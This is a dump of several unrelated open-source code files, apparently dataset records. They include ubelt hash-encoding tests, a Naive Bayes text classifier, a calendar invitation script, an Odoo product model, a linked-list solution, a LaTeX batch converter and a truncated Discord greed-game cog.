b''.join(_hashable_sequence(1, types=True))\n part = b''.join(_hashable_sequence(1, types=False))\n # assert full == b'INT\\x00\\x00\\x00\\x01'\n # assert part == b'\\x00\\x00\\x00\\x01'\n assert full == b'INT\\x01'\n assert part == b'\\x01'\n\n\ndef _test_int_bytes():\n assert ub.util_hash._int_to_bytes(0) == b'\\x00'\n assert ub.util_hash._int_to_bytes(1) == b'\\x01'\n assert ub.util_hash._int_to_bytes(2) == b'\\x02'\n assert ub.util_hash._int_to_bytes(-1) == b'\\xff'\n assert ub.util_hash._int_to_bytes(-2) == b'\\xfe'\n assert ub.util_hash._int_to_bytes(600) == b'\\x02X'\n assert ub.util_hash._int_to_bytes(-600) == b'\\xfd\\xa8'\n assert ub.util_hash._int_to_bytes(2 ** 256) == b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n assert ub.util_hash._int_to_bytes(-2 ** 256) == b'\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n\n\ndef test_xxhash():\n if 'xxh64' in ub.util_hash._HASHERS.available():\n assert ub.hash_data('foo', hasher='xxh64') == '33bf00a859c4ba3f'\n else:\n pytest.skip('xxhash is not available')\n\n\ndef test_blake3():\n if 'blake3' in ub.util_hash._HASHERS.available():\n assert ub.hash_data('foo', hasher='b3') == '04e0bb39f30b1a3feb89f536c93be15055482df748674b00d26e5a75777702e9'\n else:\n pytest.skip('blake3 is not available')\n\n\ndef test_base32():\n hashstr = ub.hash_data('abc', hasher='sha1', base=32, types=False)\n print(f'hashstr={hashstr}')\n assert hashstr == 'VGMT4NSHA2AWVOR6EVYXQUGCNSONBWE5'\n\n\ndef test_compatible_hash_bases():\n \"\"\"\n Ubelt ~1.2.3 has a ~bug~ incompatability with non-hex hash bases. Depending\n on leftover amount of data in the byte stream, our hex reencoding may be\n incorrect. It is still correct when the input has correct lengths, but in\n general it can produce issues if you were expecting hashes to conform to\n RFC standards.\n\n FIXME: THIS ISSUE IS NOT RESOLVED YET. NEED A WAY OF GETTING COMPATIBLE\n BEHAVIOR WITH STANDARD ENCODINGS. 
THIS ULTIMATELY REQUIRES PROCESSING DATA\n WITH PADDING AND VIA BYTE FORM, NOT INTEGER FORM.\n\n References:\n https://stackoverflow.com/questions/43920799/convert-byte-to-base64-and-ascii-in-python\n https://github.com/multiformats/multibase\n https://stackoverflow.com/questions/6916805/why-does-a-base64-encoded-string-have-an-sign-at-the-end\n https://github.com/semente/python-baseconv\n \"\"\"\n import pytest\n pytest.skip('FIXME THIS ISSUE IS NOT RESOLVE YET.')\n if not ub.LINUX:\n pytest.skip('only runs on linux')\n required_programs = [\n 'sha256sum', 'cut', 'xxd', 'base32',\n ]\n HAS_PROGS = all(ub.find_exe(p) for p in required_programs)\n if not HAS_PROGS:\n pytest.skip('only runs if required programs exist')\n\n hasher = 'sha1'\n hasher = 'sha256'\n # hasher = 'sha512'\n text = 'foobar'\n\n trace = ub.hash_data(text, hasher=ub.util_hash._HashTracer(), types=False)\n print(f'text={text}')\n print(f'trace={trace}')\n print(f'hasher={hasher}')\n\n hasher_obj = ub.util_hash._rectify_hasher(hasher)()\n hasher_obj.update(trace)\n raw_bytes = hasher_obj.digest()\n print(f'raw_bytes={raw_bytes}')\n import base64\n realb32_encode = base64.b32encode(raw_bytes)\n\n # base64.b32decode(realb32_encode)\n\n print(f'realb32_encode=\\n{realb32_encode}')\n _ = ub.cmd(fr'printf \"{text}\" | {hasher}sum | cut -f1 -d\\ | xxd -r -p', shell=True, system=True)\n # _ = ub.cmd(fr'printf \"{text}\" | {hasher}sum | cut -f1 -d\\ | xxd -r', shell=True, verbose=3)\n\n std_result = ub.cmd(fr'printf \"{text}\" | {hasher}sum', shell=True, verbose=3)['out'].split(' ')[0]\n our_result = ub.hash_data(text, hasher=hasher, types=False)\n print(f'std_result={std_result}')\n print(f'our_result={our_result}')\n assert our_result == std_result\n\n std_result = ub.cmd(fr'printf \"{text}\" | {hasher}sum | cut -f1 -d\\ | xxd -r -p | base32', shell=True, verbose=3)['out'].strip().replace('\\n', '')\n our_result = ub.hash_data(text, hasher=hasher, types=False, base=32)\n std_result_16 = ub.cmd(fr'printf \"{text}\" | {hasher}sum | cut -f1 -d\\ ', shell=True, verbose=3)['out'].strip().replace('\\n', '')\n our_result_16 = ub.hash_data(text, hasher=hasher, types=False, base=16)\n print(f'std_result_16={std_result_16}')\n print(f'our_result_16={our_result_16}')\n\n raw_result = base64.b16decode(our_result_16.upper())\n fix_result = base64.b32encode(raw_result).decode()\n print(f'fix_result={fix_result}')\n print(f'std_result={std_result}')\n print(f'our_result={our_result}')\n assert our_result == std_result\n\n if 1:\n\n hexstr = our_result_16\n base = ub.util_hash._ALPHABET_32\n baselen = len(base)\n # Experimental solution for _convert_hexstr_base\n\n # The alternate code has a bug, but it is concistent so we can't change\n # it. 
Work towards correct logic is here, which we will eventually\n # introduce as an opt-in change.\n import base64\n raw_bytes = base64.b16decode(hexstr.upper())\n # leftover = len(raw_bytes) % 5\n # # Pad the last quantum with zero bits if necessary\n # if leftover:\n # raw_bytes = raw_bytes + b'\\0' * (5 - leftover) # Don't use += !\n x = int.from_bytes(raw_bytes, 'big', signed=False)\n r = 0\n digits = []\n while x:\n x, r = divmod(x, baselen)\n digits.append(base[r])\n print(r)\n digits.reverse()\n newbase_str = ''.join(digits)\n print(newbase_str)\n\n import baseconv\n base32_digits = ''.join(ub.util_hash._ALPHABET_32)\n base16_digits = ''.join(ub.util_hash._ALPHABET_16)\n class MyHexConvertor(baseconv.BaseConverter):\n decimal_digits = base16_digits\n\n co = MyHexConvertor(base32_digits)\n print(f'hexstr={hexstr}')\n got = co.encode(hexstr)\n print(f'got={got}')\n\n co = MyHexConvertor(base16_digits)\n co.decimal_digits = base32_digits\n redid = co.encode(got)\n print(f'redid={redid}')\n\n r\"\"\"\n echo \"foobar\" > test.txt\n ipfs add --only-hash test.txt --cid-version=1\n\n # https://github.com/multiformats/py-multibase\n pip install py-multibase\n\n from multibase import encode, decode\n hasher_obj = ub.util_hash._rectify_hasher('sha256')()\n hasher_obj.update(b'foobar')\n raw_bytes = hasher_obj.digest()\n\n raw_bytes = b'\\xc3\\xab\\x8f\\xf17 \\xe8\\xad\\x90G\\xdd9Fk<\\x89t\\xe5\\x92\\xc2\\xfa8=J9`qL\\xae\\xf0\\xc4\\xf2'\n encode('base32', raw_bytes).upper()\n encode('base32upper', raw_bytes).upper()\n\n \"\"\"\n if base == list(base64._b32alphabet.decode()):\n # NOTE: This code has an incompatability with standard base encodings\n # because it does not pad the bytes. I.e. for base 64 3 bytes are\n # converted into 4 characters, so we need a input string divisible by\n # 3. For base32 5 bytes are converted into 2 characters.\n # in general we have to find lowest N and M such that\n #\n # N = number of characters in the encoding\n # M = number of bytes in the input\n #\n # Usually N > M\n #\n # ** N == (2 ** 8) ** M\n # or\n # ** N == (2 ** (8 * M))\n #\n # e.g. For base=64\n # 64 ** 4 == (2 ** 8) ** 3\n #\n # e.g. 
For base=32\n # 32 ** 8 == (2 ** 8) ** 5\n #\n # In general need find integer solutions for:\n # M = log(B**N)/(8*log(2))\n # or\n # N = log(256 ** M)/log(B)\n\n if 0:\n import sympy\n N, M, B = sympy.symbols('N, M, B')\n eqn = sympy.Eq((B ** N), ((2 ** 8) ** M))\n solutions = sympy.solve(eqn, N)\n print('solutions = {}'.format(ub.urepr(solutions, nl=1)))\n b = 64\n for soln in solutions:\n for m in range(1, 10):\n ans = soln.subs({M: m, B: b}).evalf()\n real, imag = ans.as_real_imag()\n if abs(imag) < 1e-8:\n fracs = real - int(real)\n if fracs < 1e-8:\n print(f'n={m}')\n print(soln)\n print(ans)\n raise Exception\n\n # There is no integer solution for base 26\n base_size = 26\n import math\n for i in range(0, 100):\n num_input_bytes = i\n num_output_symbols = math.log(256 ** num_input_bytes, base_size)\n print(f'{num_input_bytes} > {num_output_symbols}')\n\n # check\n # alphabet = base64._b32alphabet\n # s = raw_bytes\n # desired = base64.b32encode(raw_bytes)\n # print(f'desired={desired}')\n # print(f'newbase_str={newbase_str}')\n\n # leftover = len(s) % 5\n # # Pad the last quantum with zero bits if necessary\n # if leftover:\n # s = s + b'\\0' * (5 - leftover) # Don't use += !\n # encoded = bytearray()\n # from_bytes = int.from_bytes\n # b32tab2 = base64._b32tab2[alphabet]\n # for i in range(0, len(s), 5):\n # if 1:\n # i = 0\n # c = from_bytes(s[i: i + 5], 'big')\n # first = (b32tab2[c >> 30] + # bits 1 - 10\n # b32tab2[(c >> 20) & 0x3ff] + # bits 11 - 20\n # b32tab2[(c >> 10) & 0x3ff] + # bits 21 - 30\n # b32tab2[c & 0x3ff] # bits 31 - 40\n # )\n\n\nif __name__ == '__main__':\n r\"\"\"\n CommandLine:\n python ~/code/ubelt/ubelt/tests/test_hash.py\n pytest ~/code/ubelt/ubelt/tests/test_hash.py\n \"\"\"\n import xdoctest\n xdoctest.doctest_module(__file__)\n","repo_name":"Erotemic/ubelt","sub_path":"tests/test_hash.py","file_name":"test_hash.py","file_ext":"py","file_size_in_byte":25443,"program_lang":"python","lang":"en","doc_type":"code","stars":694,"dataset":"github-code","pt":"72"} +{"seq_id":"13943124547","text":"from sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfrom collections import Counter, defaultdict\r\n\r\nimport numpy as np\r\n\r\n\r\n# Ritorna un dizionario contenente il logaritmo delle probabilità per ogni classe\r\ndef occurrences(list):\r\n no_of_examples = len(list)\r\n prob = dict(Counter(list)) # Conta il numero di volte che ciascuna classe compare nel train\r\n for key in prob:\r\n prob[key] = np.log(prob[key] / no_of_examples)\r\n return prob\r\n\r\n\r\n# Calcola il logaritmo di P(word | class) nella versiona di Bernoulli applicando il Laplace smoothing\r\ndef bernoulliOccurrencesLikelihoods(list, no_document_classes):\r\n\r\n count = dict(Counter(list))\r\n nword = 0 # No. 
documenti contenenti la parola in esame\r\n for key in count:\r\n if(key != 0):\r\n nword += count[key]\r\n\r\n probability = np.log((nword + 1) / (no_document_classes + 2))\r\n return probability\r\n\r\n# Calcola il logaritmo di P(word | class) nella versione multinomiale applicando il Laplace smoothing\r\ndef multinomialOccurrencesLikelihoods(list, no_words_classes, no_words_vacublary):\r\n\r\n count = dict(Counter(list))\r\n nword = 0\r\n for key in count:\r\n if(key != 0):\r\n nword += (key * count[key])\r\n\r\n probability = np.log((nword + 1) / (no_words_classes + no_words_vacublary))\r\n return probability\r\n\r\n\r\n# Metodo che ritorna due array di dimensione (numero_classi) * (no_parole_vocabolario)\r\n# log_prob : contiene il logaritmo di P(word | class) per ogni word nel vocabolario e per ogni classe\r\n# log_prob_neg : contiene il logaritmo di (1 - P(word | class)) per ogni word nel vocabolario e per ogni classe\r\ndef bernoulliModel(classes, train_counts, train_target):\r\n\r\n rows, cols = train_counts.get_shape()\r\n log_prob_neg = np.ndarray(shape = (len(classes), cols), dtype = float)\r\n log_prob = np.ndarray(shape = (len(classes), cols), dtype = float)\r\n\r\n index = 0\r\n for cls in classes:\r\n row_indices = np.where(train_target == cls)[0]\r\n subset = train_counts[row_indices, :]\r\n row_subset, cols_subset = subset.get_shape()\r\n for j in range(cols_subset):\r\n subset_col = subset.getcol(j)\r\n log_prob[index][j] = bernoulliOccurrencesLikelihoods(subset_col.data, row_subset)\r\n log_prob_neg[index][j] = np.log(1 - np.exp(log_prob[index][j]))\r\n index += 1\r\n return log_prob, log_prob_neg\r\n\r\n# Ritorna un dizionario di dimensione (numero_classi) * (no_parole_vocabolario) contenete il logaritmo di P(word | class)\r\n# per ogni word nel vocabolario e per ogni classe\r\ndef multinomialModel(classes, train_counts, train_target, no_words_vocabulary):\r\n\r\n log_likelihoods = {}\r\n for cls in classes:\r\n log_likelihoods[cls] = defaultdict(float)\r\n\r\n for cls in classes:\r\n row_indices = np.where(train_target == cls)[0]\r\n subset = train_counts[row_indices,:] # Ottiene la sottomatrice formata dalle solo righe della classe in esame\r\n no_words_classes = subset.sum() # Conta il numero delle parole nella classe\r\n sub_rows, sub_cols = subset.get_shape()\r\n for j in range(sub_cols):\r\n subset_col = subset.getcol(j)\r\n log_likelihoods[cls][j] = multinomialOccurrencesLikelihoods(subset_col.data, no_words_classes, no_words_vocabulary)\r\n\r\n return log_likelihoods\r\n\r\n\r\n# Definisce il classificatore dell'algoritmo Naive Bayes nella versione di bernoulli\r\n# Calcola la P(Class | X) = ln(P(class)) + sommatoria per i da 1 a |V| di (ln(P(xi | class))^xi + ln(1 - P(xi | class))^(1 -xi))\r\n# Ritorna un vettore contenente l'etichette ottenute applicando la tecnica di MAP all'array results\r\ndef bernoulliClassifier(test_counts, classes, log_class_probabilities, log_prob_likelihoods, log_prob_neg_likelihoods):\r\n\r\n rows, cols = test_counts.get_shape()\r\n results = np.ndarray(shape = (rows, len(classes)), dtype = float)\r\n\r\n sum_log_neg = np.sum(log_prob_neg_likelihoods, axis = 1)\r\n index_row_test = 0\r\n for i in range(rows):\r\n row = test_counts.getrow(i)\r\n index_cls = 0\r\n for cls in classes:\r\n sum = log_class_probabilities[cls]\r\n index_row = row.indices\r\n for j in index_row:\r\n sum += (log_prob_likelihoods[index_cls][j] - log_prob_neg_likelihoods[index_cls][j])\r\n sum += sum_log_neg[index_cls]\r\n results[index_row_test][index_cls] = 
sum\r\n index_cls += 1\r\n index_row_test += 1\r\n\r\n predicted = []\r\n for i in range(rows):\r\n index_cls = None\r\n max = float(\"-inf\")\r\n for cls in classes:\r\n if(results[i][cls] > max):\r\n max = results[i][cls]\r\n index_cls = cls\r\n predicted.append(index_cls)\r\n\r\n return predicted\r\n\r\n# Definisce il classificatore dell'algoritmo di Naive Bayes nella versione multinomiale\r\n# Calcola la P(Class | X) = ln(P(class)) + sommatoria per i da 1 a |V| di ln(P(xi | class) * xi)\r\n# Ritorna un vettore contenente l'etichette ottenute applicando la tecnica di MAP all'array results\r\ndef multinomialClassifier(test_counts, classes, log_likelihoods, log_class_probabilities):\r\n\r\n rows, cols = test_counts.get_shape()\r\n results = {}\r\n for i in range(rows):\r\n results[i] = defaultdict(float)\r\n\r\n index_row_test = 0\r\n for i in range(rows):\r\n row = test_counts.getrow(i)\r\n index_row = row.indices\r\n for cls in classes:\r\n sum = log_class_probabilities[cls]\r\n value_data = 0\r\n for j in index_row:\r\n sum += (log_likelihoods[cls][j] * row.data[value_data])\r\n value_data += 1\r\n results[index_row_test][cls] = sum\r\n index_row_test += 1\r\n\r\n predicted = []\r\n for i in range(rows):\r\n index_cls = None\r\n max = float(\"-inf\")\r\n for cls in classes:\r\n if(results[i][cls] > max):\r\n max = results[i][cls]\r\n index_cls = cls\r\n predicted.append(index_cls)\r\n\r\n return predicted\r\n\r\n# Definisce i passi da eseguire per l'applicazione del classificatore di testo Naive Bayes nella versione di bernoulli\r\n# Ritorna la precisione e la matrice di confusione che il classificatore ha ottenuto\r\ndef bernoulliNB(classes, class_probabilities, train_counts, test_counts, train_target, test_target):\r\n\r\n #Calcolo probabilità condizionata\r\n log_prob_likelihoods, log_prob_neg_likelihoods = bernoulliModel(classes, train_counts, train_target)\r\n\r\n predicted = bernoulliClassifier(test_counts,classes,class_probabilities, log_prob_likelihoods, log_prob_neg_likelihoods)\r\n\r\n accuracy = accuracy_score(test_target, predicted)\r\n conf_matrix = confusion_matrix(test_target, predicted)\r\n\r\n return accuracy, conf_matrix\r\n\r\n# Definisce i passi da eseguire per l'applicazione del classificatore di testo Naive Bayes nella versione multinomiale\r\n# Ritorna la precisione e la matricie di confusione che il classificatore ha ottenuto\r\ndef multinomialNB(classes, class_probabilities, train_counts, test_counts, train_target, test_target):\r\n\r\n rows, cols = train_counts.get_shape()\r\n no_word_vocabulary = cols\r\n\r\n #likelihoods: Calcola il logaritmo delle probabilità condizionate di ogni parola\r\n log_likelihoods = multinomialModel(classes, train_counts, train_target, no_word_vocabulary)\r\n\r\n predicted = multinomialClassifier(test_counts, classes, log_likelihoods, class_probabilities)\r\n\r\n accuracy = accuracy_score(test_target, predicted)\r\n conf_matrix = confusion_matrix(test_target, predicted)\r\n\r\n return accuracy, conf_matrix\r\n\r\n# Costruisce la matrice dei conteggi del train e del test\r\n# Invoca il metodo per calcolare il logaritmo delle probabilità delle classi\r\n# Ritorna le precisioni e le matrici di confusione ottenute applicando i classificatori di Naive Bayes nella versione\r\n# di bernoulli e nella versione multinomiale\r\ndef naiveBayes(train_data, train_target, test_data, test_target):\r\n\r\n # Costruisce la matrice di train dei conteggi dai documenti di 20 newsgroup\r\n count_vector = CountVectorizer(stop_words= 'english', lowercase 
= True)\r\n train_counts = count_vector.fit_transform(train_data)\r\n\r\n # Costruisce la matrice di test dei conteggi dai documenti di 20 newsgroup\r\n test_counts = count_vector.transform(test_data)\r\n\r\n # Identifica quali sono le classi\r\n classes = np.unique(train_target)\r\n\r\n # Calcola probabilità di ogni classe, P(prior)\r\n log_class_probabilities = occurrences(train_target)\r\n\r\n print(\"I'm applying Bernoulli Naive Bayes...\")\r\n accuracy_bernoulli, conf_matrix_bernoulli = bernoulliNB(classes, log_class_probabilities, train_counts,\r\n test_counts, train_target, test_target)\r\n print(\"I'm applying Multinomial Naive Bayes...\")\r\n accuracy_multinomial, conf_matrix_multinomial = multinomialNB(classes, log_class_probabilities, train_counts,\r\n test_counts, train_target, test_target)\r\n\r\n return accuracy_bernoulli, conf_matrix_bernoulli, accuracy_multinomial, conf_matrix_multinomial\r\n","repo_name":"Bellocci/Implementazione-Naive-Bayes","sub_path":"TextClassification.py","file_name":"TextClassification.py","file_ext":"py","file_size_in_byte":9256,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9739765516","text":"import os\nimport sys\nfrom pathlib import Path\nfrom dotenv import load_dotenv\nfrom argparse import ArgumentParser\nfrom icalendar import Calendar, Event\nfrom dateparser import parse\nfrom datetime import datetime, timezone, timedelta\n\n\nload_dotenv()\n\n\ndef main() -> int:\n template = os.environ.get(\"TEMPLATE_FILE\", \"invitation_template.txt\")\n zoom_link = os.environ.get(\"ZOOM_LINK\", \"\")\n timezone_id = 'Europe/Helsinki'\n\n parser = ArgumentParser()\n parser.add_argument(\"date\", type=str)\n parser.add_argument(\"presenter\", type=str)\n parser.add_argument(\"topic\", type=str)\n parser.add_argument(\"--zoom\", type=str, default=zoom_link)\n parser.add_argument(\"--template\", type=str, default=template)\n args = parser.parse_args()\n\n parsed_date = parse(args.date, settings={'TIMEZONE': timezone_id, 'DATE_ORDER': 'DMY'}, languages=['fi', 'en'])\n #print(f\"Original date: {args.date}\")\n #print(\" Parsed date: {}\".format(parsed_date.strftime(\"%a %b %-d, %Y at %H:%M\")))\n\n template = Path(args.template)\n if not template.is_file():\n print(f\"Could not find template file at: {template}.\")\n return -1\n\n print(\"#### INVITATION STARTS ####\\n\")\n with open(template) as template_file:\n template_str = \"\".join(template_file.readlines())\n template_filled = template_str.format(date=parsed_date.strftime(\"%a %b %-d, %Y at %H:%M\"), presenter=args.presenter, topic=args.topic, zoom_link=args.zoom)\n print(template_filled)\n print(\"\\n#### INVITATION ENDS ####\\n\")\n\n def display(cal):\n return cal.to_ical().replace('\\r\\n', '\\n').strip()\n\n cal = Calendar()\n cal.add('prodid', '-//Python Club Calendar Tool//pythonclubcalendartool.turqoosi.net//')\n cal.add('version', '2.0')\n cal.add('calscale', 'GREGORIAN')\n cal.add('tzid', timezone_id)\n\n event = Event()\n event.add('created', datetime.now())\n event.add('dtstart', parsed_date, parameters={'TZID': timezone_id})\n event.add('dtend', parsed_date+timedelta(hours=1), parameters={'TZID': timezone_id})\n event.add('summary', f\"Python Club: {args.topic}\")\n event.add('description', template_filled)\n event['location'] = args.zoom\n\n cal.add_component(event)\n ical = cal.to_ical()\n ical_str = ical.replace(b'\\r\\n', b'\\n').strip().decode()\n\n print(\"#### CAL.ICS STARTS ####\\n\")\n print(ical_str)\n print(\"\\n#### 
CAL.ICS ENDS ####\\n\")\n\n ical_filename = Path(parsed_date.strftime(\"Python_Club_%Y%m%d_%H%M.ics\"))\n if ical_filename.is_file():\n print(f\"ERROR: File {ical_filename} already exists. Refusing to overwrite.\")\n sys.exit(-1)\n\n with open(ical_filename, 'w') as file:\n file.write(ical_str)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n","repo_name":"juusokorhonen/python-club","sub_path":"events/create_invitation.py","file_name":"create_invitation.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5262508091","text":"from odoo import api, fields, models\n\n\nclass ProductSecondaryUnit(models.Model):\n _name = \"product.secondary.unit\"\n _description = \"Product Secondary Unit\"\n\n name = fields.Char(required=True, translate=True)\n code = fields.Char()\n product_tmpl_id = fields.Many2one(\n comodel_name=\"product.template\",\n string=\"Product Template\",\n required=True,\n ondelete=\"cascade\",\n )\n product_id = fields.Many2one(\n comodel_name=\"product.product\",\n string=\"Product Variant\",\n ondelete=\"cascade\",\n )\n uom_id = fields.Many2one(\n comodel_name=\"uom.uom\",\n string=\"Secondary Unit of Measure\",\n required=True,\n help=\"Default Secondary Unit of Measure.\",\n )\n dependency_type = fields.Selection(\n selection=[\n (\"dependent\", \"Dependent\"),\n (\"independent\", \"Independent\"),\n ],\n default=\"dependent\",\n help=\"If dependency type is 'dependent' the factor is used \"\n \"to compute quantity in primary unit,\"\n \"otherwise primary and secondary unit are independent. \"\n \"For example if you sell service\"\n \"by package (1 unit for example) and you want to put the \"\n \"real time (ex : 4 hours) to allows employee scheduling\",\n )\n factor = fields.Float(string=\"Secondary Unit Factor\", default=1.0, required=True)\n active = fields.Boolean(default=True)\n\n def name_get(self):\n result = []\n for unit in self:\n result.append(\n (\n unit.id,\n \"{unit_name}-{factor}\".format(\n unit_name=unit.name, factor=unit.factor\n ),\n )\n )\n return result\n\n @api.model\n def name_search(self, name=\"\", args=None, operator=\"ilike\", limit=100):\n if args is None:\n args = []\n units = self.search([(\"code\", \"=\", name)] + args, limit=1)\n if not units:\n return super(ProductSecondaryUnit, self).name_search(\n name=name, args=args, operator=operator, limit=limit\n )\n return units.name_get()\n","repo_name":"OCA/product-attribute","sub_path":"product_secondary_unit/models/product_second_unit.py","file_name":"product_second_unit.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"72"} +{"seq_id":"40299806506","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def removeElements(self, head, val):\r\n \"\"\"\r\n :type head: ListNode\r\n :type val: int\r\n :rtype: ListNode\r\n \"\"\"\r\n if not head:\r\n return None\r\n current = head\r\n previous = None\r\n while current:\r\n if current.val == val:\r\n if current == head:\r\n head = current.next\r\n current = current.next\r\n else:\r\n previous.next=current.next\r\n current=current.next\r\n else:\r\n previous = current\r\n current = current.next\r\n return head","repo_name":"jingweiwu26/Practice_code","sub_path":"203. Remove Linked List Elements.py","file_name":"203. 
Remove Linked List Elements.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8923657269","text":"import os\nimport sys\nimport subprocess\n\n\ndef main():\n if len(sys.argv)!=4:\n print(\"Usage: python3 master.py /path/to/dir/of/tex/dirs/ /path/to/xhtml/output/ /path/to/json/output/\")\n exit()\n path = os.path.abspath(sys.argv[1])\n xhtmlpath = os.path.abspath(sys.argv[2])\n jsonpath = os.path.abspath(sys.argv[3])\n cdir = os.listdir(path)\n outfolders = []\n folders = []\n for x in cdir:\n if os.path.isdir(os.path.join(path,x)) and x[0]!='.':\n outfolders.append(os.path.split(x)[1])\n\n xhtml = []\n json = []\n for x in outfolders:\n xhtml.append(os.path.join(xhtmlpath,x+'_converted/'))\n json.append(os.path.join(jsonpath,x+'_json/'))\n\n for i, x in enumerate(outfolders):\n # print(outfolders[i],xhtml[i],json[i])\n proc = subprocess.Popen([\"python3\",\"convertlatex.py\",os.path.join(path,outfolders[i],'')+'/',xhtml[i]])\n proc.wait()\n proc = subprocess.Popen([\"python3\",\"proctex.py\",os.path.join(path,outfolders[i],'')+'/',xhtml[i],json[i]])\n proc.wait()\n\nif __name__ == '__main__':\n main()\n","repo_name":"hopper-project/hoptex","sub_path":"master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13757310105","text":"import sqlite3\nimport discord\nfrom discord.ext import commands, tasks\nimport time\nimport asyncio\n\n\ncon = sqlite3.connect('greed.db')\ncur = con.cursor()\n\nclass Greed(commands.Cog, description=\"Greed control\"):\n def __init__(self, client: commands.Bot):\n self.client = client\n self.index = 0\n \n # Place your bet!\n @commands.command(help=\"Place your bets! Syntax: `$greed (number)`\")\n async def greed(self, ctx):\n user_id = ctx.message.author.id\n if self.Jail.check_jail(user_id) == True:\n await ctx.send(\"You can't play greed control in jail!\")\n return\n \n max_bet = Greed.get_user(self, 0)[2]\n await ctx.author.send(\"Pick a number between 1 and \" + str(max_bet) + \".\")\n channel = ctx.author.dm_channel\n def check(m):\n if m.channel != channel:\n return False\n bet = m.content\n try: \n bet = int(bet)\n except:\n return False\n if bet < 1 or bet > max_bet:\n return False\n return True\n bet = await self.client.wait_for(\"message\", check=check, timeout=15)\n bet = int(bet.content) \n previous = Greed.get_user(self, user_id)[2]\n cur.execute(\"UPDATE scores SET bet=? 
WHERE user=?\", (bet, user_id))\n con.commit()\n if previous == 0:\n await channel.send(\"Successfully picked \" + str(bet) + \"!\")\n else:\n await channel.send(\"Successfully updated the bet to \" + str(bet) + \"!\")\n\n # Displays the current greed control score\n @commands.command(name=\"points_greed\", help=\"Displays your current point total.\")\n async def show_current(self, ctx):\n channel = ctx.message.channel\n user_id = ctx.message.author.id \n points = self.get_user(user_id)[1]\n await channel.send(\"You currently have \" + str(points) + \" points in Greed Control.\")\n\n # Displays a top 10 leaderboard in greed control\n @commands.command(name=\"greederboard\", help=\"Displays the top 10 point scores in greed control.\")\n async def leaderboard(self, ctx):\n channel = ctx.message.channel\n cur.execute(\"SELECT user, score FROM scores ORDER BY score DESC\")\n winners = cur.fetchmany(11)\n del winners[0]\n max_score = float(self.get_user(0)[1])\n string = \"Greed control leaderboard. The score required to win is: \" + str(max_score)\n for i in range(len(winners)):\n user_id = int(winners[i][0])\n user = await self.client.fetch_user(user_id)\n name = user.display_name\n string = string + \"\\n\" + str(name) + \": `\" \\\n + str(winners[i][1]) + \"`\"\n await channel.send(string)\n\n\n\n # Scuffed function to get a function to run at midnight each day, obsolete\n @commands.command()\n async def timer(self, ctx):\n if ctx.message.author.id != 732415222706339840:\n return\n while True:\n current = time.ctime()\n seconds = int(current[17:19])\n minutes = int(current[14:16])\n hours = int(current[11:13])\n wait = (23 - hours)*3600 + (59-minutes)*60 + seconds\n if wait == 0:\n wait = 86400\n print(wait)\n await asyncio.sleep(wait)\n await self.give_points()\n await asyncio.sleep(30)\n \n\n # Distributes points every 24 hours\n async def give_points(self):\n channel_id = 928099803768950834\n channel = await self.client.fetch_channel(channel_id)\n max_bet = int(self.get_user(0)[2])\n max_score = int(self.get_user(0)[1])\n print(max_score)\n\n # Creates list showing how often each number was picked\n freq = []\n for i in range(max_bet):\n freq.append(0)\n\n scores = self.get_full()\n string = \"Points awarded: \"\n del scores[0]\n for user in scores:\n pick = user[2]\n if pick != 0:\n freq[pick-1] += 1\n print(freq)\n\n string = \"Distribution of numbers: \"\n for i in range(max_bet):\n string += \"\\n\" + str(i+1) + \": \" + str(freq[i])\n await channel.send(string)\n\n # Creates list showing points awarded for each number\n points = []\n for i in range(len(freq)):\n if freq[i] == 0:\n points.append(0)\n else:\n points.append(round(int(i+1) / freq[i], 4))\n print(points)\n\n winners = []\n for user in scores:\n user_id = user[0]\n if user[2] > 0:\n earned = points[user[2]-1]\n new_score = round(user[1] + earned, 4)\n if new_score >= max_score:\n winners.append(user_id)\n cur.execute(\"UPDATE scores SET score=?, bet=? WHERE user=?\", (new_score, 0, user_id))\n\n if len(winners) >= 1:\n if len(winners) == 1:\n await channel.send(\"<@\" + str(winners[0]) + \"> has won the game!\")\n else:\n string = \"Winners: \"\n for user_id in winners:\n string += \"\\n<@\" + str(user_id) + \">\"\n await channel.send(string)\n await self.end()\n con.commit()\n\n # test function\n # @commands.command()\n # async def test(self, ctx):\n # await Greed.printer(self)\n\n\n # Makes a new reaper game (this game is global)\n @commands.command(help=\"Begins a new Greed Control game. 
